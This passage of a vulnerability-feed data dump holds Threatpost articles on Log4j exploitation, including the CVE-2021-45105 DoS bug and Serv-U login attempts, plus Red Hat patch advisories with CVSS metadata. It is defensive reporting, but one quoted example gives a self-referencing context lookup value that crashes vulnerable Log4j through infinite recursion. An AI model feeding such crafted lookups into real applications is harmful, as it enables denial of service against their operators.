That\n\nJake Williams, co-founder and CTO at BreachQuest, echoed Microsoft\u2019s assertion that this vulnerability will have an extremely long tail for exploitation, considering that many organizations don\u2019t even realize they\u2019re running vulnerable software.\n\n\u201cUnfortunately (and nobody wants to hear this), there\u2019s nothing left to say about remediating log4j that hasn\u2019t already been said hundreds of times,\u201d Williams told Threatpost. \u201cAny organization asking today what they need to do regarding log4j almost certainly has an incident on their hands. Every organization with a security team knows what needs to be done to hunt down log4j, they just need the resources and political backing to actually get it done. Being exploited through an internet-facing system running vulnerable log4j at this point is a leadership failure, not a technical one.\u201d\n\n_**Password** **Reset: ****[On-Demand Event](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>):** Fortify 2022 with a password-security strategy built for today\u2019s threats. This [Threatpost Security Roundtable](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>), built for infosec professionals, centers on enterprise credential management, the new password basics and mitigating post-credential breaches. Join Darren James, with Specops Software and Roger Grimes, defense evangelist at KnowBe4 and Threatpost host Becky Bracken. **[Register &amp; stream this FREE session today](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>)** \u2013 sponsored by Specops Software._\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-04T22:49:54", "type": "threatpost", "title": "Microsoft Sees Rampant Log4j Exploit Attempts, Testing", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44428", "CVE-2021-44832", "CVE-2021-45046"], "modified": "2022-01-04T22:49:54", "id": "THREATPOST:3A5F59D56E40560C393A3F69A362A31B", "href": "https://threatpost.com/microsoft-rampant-log4j-exploits-testing/177358/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-20T16:11:34", "description": "No, you\u2019re not seeing triple: On Friday, Apache released yet another patch \u2013 [version 2.17](<https://logging.apache.org/log4j/2.x/download.html>) \u2013 for yet another flaw in the ubiquitous log4j logging library, this time for a DoS bug.\n\nTrouble comes in threes, and this is the third one for log4j. The latest bug isn\u2019t a variant of the Log4Shell remote-code execution (RCE) bug that\u2019s plagued IT teams since Dec. 10, coming [under active attack](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) [worldwide](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>) within hours of its public disclosure, spawning [even nastier mutations](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) and leading to the [potential for denial-of-service](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>) (DoS) in Apache\u2019s initial patch.\n\nIt does have similarities, though: The new bug affects the same component as the Log4Shell bug. Both the Log4Shell, tracked as [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) (criticality rating of CVSS 10.0) and the new bug, tracked as [CVE-2021-45105](<https://nvd.nist.gov/vuln/detail/CVE-2021-45105>) (CVSS score: 7.5) abuse attacker-controlled lookups in logged data.\n\nThe difference: The lookups in the new bug, CVE-2021-45105, are Context Map lookups instead of the Java Naming and Directory Interface (JNDI) lookups to an LDAP server that allow attackers to execute any code that\u2019s returned in the Log4Shell vulnerability.\n\nContextMapLookup allows applications to store data in the Log4j ThreadContext Map and then retrieve the values in the Log4j configuration: For example, an app would store the current user\u2019s login id in the ThreadContext Map with the key \u201cloginId\u201d.\n\nThe weakness has to do with improper input validation and uncontrolled recursion that can lead to DoS.\n\nAs [explained](<https://www.zerodayinitiative.com/blog/2021/12/17/cve-2021-45105-denial-of-service-via-uncontrolled-recursion-in-log4j-strsubstitutor>) by Guy Lederfein of the Trend Micro Research Team, \u201cthe Apache Log4j API supports variable substitution in lookups. However, a crafted variable can cause the application to crash due to uncontrolled recursive substitutions. An attacker with control over lookup commands (e.g., via the Thread Context Map) can craft a malicious lookup variable, which results in a Denial-of-Service (DoS) attack.\u201d\n\nThe new vulnerability affects all versions of the tool from 2.0-beta9 to 2.16, which Apache shipped last week to remediate the [second flaw](<https://threatpost.com/new-log4shell-attack-vector-local-hosts/177128/>) in the trio. That second bug was the RCE flaw [CVE-2021-45046](<https://nvd.nist.gov/vuln/detail/CVE-2021-45046>), which, in turn, stemmed from Apache\u2019s [incomplete fix](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>) for [CVE-2021-44228](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>), aka the Log4Shell vulnerability.\n\nLederfein continued: \u201cWhen a nested variable is substituted by the StrSubstitutor class, it recursively calls the substitute() class. However, when the nested variable references the variable being replaced, the recursion is called with the same string. This leads to an infinite recursion and a DoS condition on the server. As an example, if the Pattern Layout contains a Context Lookup of ${ctx.apiversion}, and its assigned value is ${${ctx.apiversion}}, the variable will be recursively substituted with itself.\u201d\n\nThe vulnerability has been tested and confirmed on Log4j versions up to and including 2.16, he said.\n\nApache has listed mitigating factors, but ZDI recommends upgrading to the latest version to ensure that the bug is completely addressed.\n\nThe latest bug and Apache\u2019s new round of fixes are just the latest news in the ongoing, ever-shifting log4j situation. As exploits flood in, new vulnerabilities emerge and patches turn out to need patching, huge tech players [such as SAP](<https://threatpost.com/sap-log4shell-vulnerability-apps/177069/>) have been hurrying to hunt down the logging library and to release product patches.\n\n## CISA Mandates Immediate Patching\n\nOn Thursday, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an [emergency directive](<https://www.cisa.gov/uscert/ncas/current-activity/2021/12/17/cisa-issues-ed-22-02-directing-federal-agencies-mitigate-apache>) mandating federal civilian departments and agencies to immediately patch their internet-facing systems for the Log4j vulnerabilities by Thursday, Dec. 23.\n\nThe risk presented by the library\u2019s vulnerabilities is sky-high, as multiple threat actors have jumped on the opportunities to exploit vulnerable systems. As Check Point Research (CPR) [highlighted](<https://blog.checkpoint.com/2021/12/11/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1/>) last week, real-life attacks have included a crypto-mining group that launched attacks in five countries.\n\nLast week, Microsoft reported that nation-state groups Phosphorus (Iran) and [Hafnium](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) (China), as well as unnamed APTs from North Korea and Turkey, are actively exploiting Log4Shell in targeted attacks. Hafnium is known for targeting Exchange servers with the ProxyLogon zero-days back in March, while Phosphorus \u2013 aka [Charming Kitten](<https://threatpost.com/charming-kitten-whatsapp-linkedin-effort/158813/>), APT35, Ajax Security Team, NewsBeef and Newscaster \u2013 [made headlines](<https://threatpost.com/microsoft-iranian-apt-t20-summit-munich-security-conference/160654/>) for targeting global summits and conferences in 2020.\n\nCPR said that Charming Kitten had gone after seven Israeli targets as of Wednesday.\n\n## Conti Ransomware Gang Is Among the Attackers\n\nThe Conti ransomware gang is in on it too: AdvIntel researchers said last week that they\u2019re seen Conti operators going after VMware vCenter.\n\n\u201cThe current exploitation led to multiple use cases through which the Conti group tested the possibilities of utilizing the Log4j 2 exploit,\u201d the researchers [said](<https://www.advintel.io/post/ransomware-advisory-log4shell-exploitation-for-initial-access-lateral-movement>) last week. \u201cThe criminals pursued targeting specific vulnerable [Log4j 2 VMware vCenter](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>) [servers] for lateral movement directly from the compromised network resulting in vCenter access affecting U.S. and European victim networks from the pre-existent Cobalt Strike sessions.\u201d\n\nLast week, a ransomware attack that some suspect may be attributable to the [Conti gang](<https://threatpost.com/conti-ransomware-backups/175114/>) forced a family-run chain of restaurants, hotels and breweries, [McMenamins](<https://www.mcmenamins.com/>), to [shut down some operations.](<https://threatpost.com/conti-gang-ransomware-attack-mcmenamins/177119/>)\n\nThe bugs are also being leveraged by botnets, remote access trojans (RATs), initial access brokers, and a new ransomware strain called Khonsari. As of Monday, CPR said that it\u2019s seen more than 4.3 million attempted exploits, more than 46 percent of which were made by \u201cknown malicious groups.\u201d\n\n## Yet More Sleepless Nights\n\nTrend Micro\u2019s Lederfein noted that the log4j component has had quite a run in the vulnerability spotlight, having received \u201cquite a bit of attention\u201d since the Log4Shell vulnerability was revealed 10 days ago. Expect more of the same, he predicted, as \u201cit would not be a surprise to see further bugs disclosed \u2013 with or without a patch.\u201d\n\nTom Garrubba, CISO with Shared Assessments, concurred: \u201cThis vulnerability has been keeping a lot of security professionals up at night,\u201d he told Threatpost. This Javageddon has even percolated up to the C-suite, he said, with the vulnerability \u201ckeeping a lot of security professionals up at night.\u201d\n\n\u201cExecutives and board members are also gaining interest as to how this will affect them as well,\u201d he said via email. \u201cLog4j is used all throughout the Internet and [affects] multiple applications and systems with deep roots.\u201d\n\n\u201cThe best path you can take right now it\u2019s a stay alert of all patches that are coming out to address this vulnerability and put them into place immediately,\u201d Garrubba advised. \u201cSadly, it appears this is going to affect organization\u2019s continuously into the future as they identify more items that are affected by this vulnerability.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T16:01:57", "type": "threatpost", "title": "Third Log4J Bug Can Trigger DoS; Apache Issues Patch", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-20T16:01:57", "id": "THREATPOST:10D0F1DDDD6C211DA3CE6395900B7C54", "href": "https://threatpost.com/third-log4j-bug-dos-apache-patch/177159/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-20T23:09:28", "description": "Attackers are trying to log in to SolarWinds Serv-U file-sharing software via attacks exploiting the Log4j flaws.\n\nThis is a confusing story: Initially, Microsoft had warned on Wednesday that attackers were exploiting a previously undisclosed vulnerability in the SolarWinds Serv-U file-sharing software to propagate Log4j attacks against networks\u2019 internal devices via the SolarWinds bug.\n\nSolarWinds had issued a fix the day before, on Tuesday.\n\nSolarWinds subsequently reached out to Threatpost and other news outlets on Thursday to clarify that Microsoft\u2019s report referred to a threat actor attempting to login to Serv-U using the Log4j vulnerability. The attempt failed, given that Serv-U doesn\u2019t use Log4j code and the target for authentication \u2013 LDAP (Microsoft Active Directory) \u2013 isn\u2019t susceptible to Log4j attacks. \n\nThe SolarWinds vulnerability, tracked as [CVE-2021-35247](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35247>), is an input validation flaw that could allow attackers to build a query, given some input, and to send that query over the network without sanitation, Microsoft\u2019s Threat Intelligence Center (MSTIC) [said](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/#CVE-2021-35247>).\n\n[](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>)\n\nThe bug, discovered by Microsoft\u2019s Jonathan Bar Or, affects Serv-U versions 15.2.5 and prior. SolarWinds fixed the vulnerability in Serv-U version 15.3, [released](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35247>) on Tuesday.\n\n\u201cThe Serv-U web login screen to LDAP authentication was allowing characters that were not sufficiently sanitized,\u201d SolarWinds [said](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35247>) in its advisory, adding that it had updated the input mechanism \u201cto perform additional validation and sanitization.\u201d\n\nMicrosoft security researcher Jonathan Bar Or, credited with discovering the bug, explained that he had seen attacks coming from serv-u.exe while hunting for log4j exploit attempts. \u201cTaking a closer looked revealed you could feed Serv-U with data and it\u2019ll build a LDAP query with your unsanitized input!\u201d he [said](<https://twitter.com/yo_yo_yo_jbo/status/1483951175997149184>). \u201cThis could be used for log4j attack attempts, but also for LDAP injection.\u201d\n\nA SolarWinds representative told Threatpost that the attacker wasn\u2019t able to login to Serv-U, and that the Microsoft researcher was referencing attempted logins that failed, since Serv-U doesn\u2019t leverage Log4J code.\n\nSolarWinds said that it hasn\u2019t seen any \u201cdownstream [effect]\u201d of the bug, given that \u201cthe LDAP servers ignored improper characters.\u201d\n\nFor its part, MSTIC didn\u2019t give details about the attack it observed.\n\n## Just the Latest in Ongoing Log4j Barrage\n\nThe Serv-U attacks are just the latest in the rampant Log4j exploit attempts and testing that have been [thrown at](<https://threatpost.com/microsoft-rampant-log4j-exploits-testing/177358/>) the multiple flaws in Apache\u2019s [Log4j logging library](<https://threatpost.com/log4j-vulnerability-pressures-security-world/177721/>) since those flaws were [disclosed](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) \u2013 and came under near-immediate attack \u2013 last month.\n\nOn Tuesday, Akamai researchers also [reported](<https://www.akamai.com/blog/security/mirai-botnet-abusing-log4j-vulnerability>) that they\u2019ve detected evidence of the unauthenticated remote code execution (RCE) vulnerability in Log4j \u2013 tracked as CVE-2021-44228 \u2013 being adapted to infect and assist in the proliferation of malware used by the [Mirai](<https://threatpost.com/gafgyt-botnet-ddos-mirai/165424/>) botnet by targeting [Zyxel networking devices](<https://www.zyxel.com/us/en/support/Zyxel_security_advisory_for_Apache_Log4j_RCE_vulnerability.shtml>).\n\nMSTIC strongly recommended that affected customers apply the SolarWinds security updates.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-20T18:39:21", "type": "threatpost", "title": "Microsoft: Attackers Tried to Login to SolarWinds Serv-U Via Log4j Bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35247", "CVE-2021-44228"], "modified": "2022-01-20T18:39:21", "id": "THREATPOST:187B01687ED5D3975CD6E42E84DD9B13", "href": "https://threatpost.com/microsoft-log4j-attackssolarwinds-serv-u-bug/177824/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2023-05-25T12:20:40", "description": "Red Hat Data Grid is an in-memory, distributed, NoSQL datastore solution. It increases application response times and allows for dramatically improving performance while providing availability, reliability, and elastic scale.\n \nData Grid 8.2.3 replaces Data Grid 8.2.2 and includes bug fixes and enhancements. Find out more about Data Grid 8.2.3 in the Release Notes [3].\n\nSecurity Fix(es):\n\n* log4j-core: remote code execution via JDBC Appender (CVE-2021-44832)\n\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\n* log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern (CVE-2021-45105)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-20T11:36:05", "type": "redhat", "title": "(RHSA-2022:0205) Moderate: Red Hat Data Grid 8.2.3 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-20T11:36:29", "id": "RHSA-2022:0205", "href": "https://access.redhat.com/errata/RHSA-2022:0205", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-25T12:20:40", "description": "This release of Red Hat build of Eclipse Vert.x 4.1.8 GA includes security updates. For more information, see the release notes listed in the References section.\n\nSecurity Fix(es):\n\n* log4j-core: remote code execution via JDBC Appender (CVE-2021-44832)\n\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\n* log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern (CVE-2021-45105)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-20T12:09:30", "type": "redhat", "title": "(RHSA-2022:0083) Moderate: Red Hat build of Eclipse Vert.x 4.1.8 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-20T12:09:40", "id": "RHSA-2022:0083", "href": "https://access.redhat.com/errata/RHSA-2022:0083", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-25T12:20:40", "description": "The releases of Red Hat Fuse 7.8.2, 7.9.1 and 7.10.1 serve as a patch to Red Hat Fuse on Karaf and Red Hat Fuse on Spring Boot and includes security fixes, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n\n* log4j-core: remote code execution via JDBC Appender (CVE-2021-44832)\n\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\n* log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern (CVE-2021-45105)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-20T09:22:41", "type": "redhat", "title": "(RHSA-2022:0203) Critical: Red Hat Fuse 7.8-7.10 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-20T09:23:05", "id": "RHSA-2022:0203", "href": "https://access.redhat.com/errata/RHSA-2022:0203", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-25T12:20:40", "description": "This update of Red Hat Integration - Camel Extensions for Quarkus serves as a replacement for 2.2 GA and includes the following security Fix(es):\n\nSecurity Fix(es):\n\n* log4j-core: remote code execution via JDBC Appender (CVE-2021-44832)\n\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\n* log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern (CVE-2021-45105)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-20T18:50:57", "type": "redhat", "title": "(RHSA-2022:0222) Moderate: Red Hat Integration Camel Extensions for Quarkus 2.2 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-20T18:51:20", "id": "RHSA-2022:0222", "href": "https://access.redhat.com/errata/RHSA-2022:0222", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-25T12:20:40", "description": "A minor version update (from 1.6.2 to 1.6.3) is now available for Red Hat Camel K that includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* log4j-core: remote code execution via JDBC Appender (CVE-2021-44832)\n\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\n* log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern (CVE-2021-45105)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-20T18:51:49", "type": "redhat", "title": "(RHSA-2022:0223) Moderate: Red Hat Integration Camel-K 1.6.3 release and security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-20T18:52:01", "id": "RHSA-2022:0223", "href": "https://access.redhat.com/errata/RHSA-2022:0223", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-25T12:20:40", "description": "Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime.\n\nThis asynchronous patch is a security update for Red Hat JBoss Enterprise Application Platform 7.4.\n\nSecurity Fix(es):\n\n* log4j-core: remote code execution via JDBC Appender (CVE-2021-44832)\n\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\n* log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern (CVE-2021-45105)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-20T15:56:27", "type": "redhat", "title": "(RHSA-2022:0216) Low: Red Hat JBoss Enterprise Application Platform 7.4 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-20T15:56:55", "id": "RHSA-2022:0216", "href": "https://access.redhat.com/errata/RHSA-2022:0216", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cisco": [{"lastseen": "2023-05-23T16:22:55", "description": "Critical Vulnerabilities in Apache Log4j 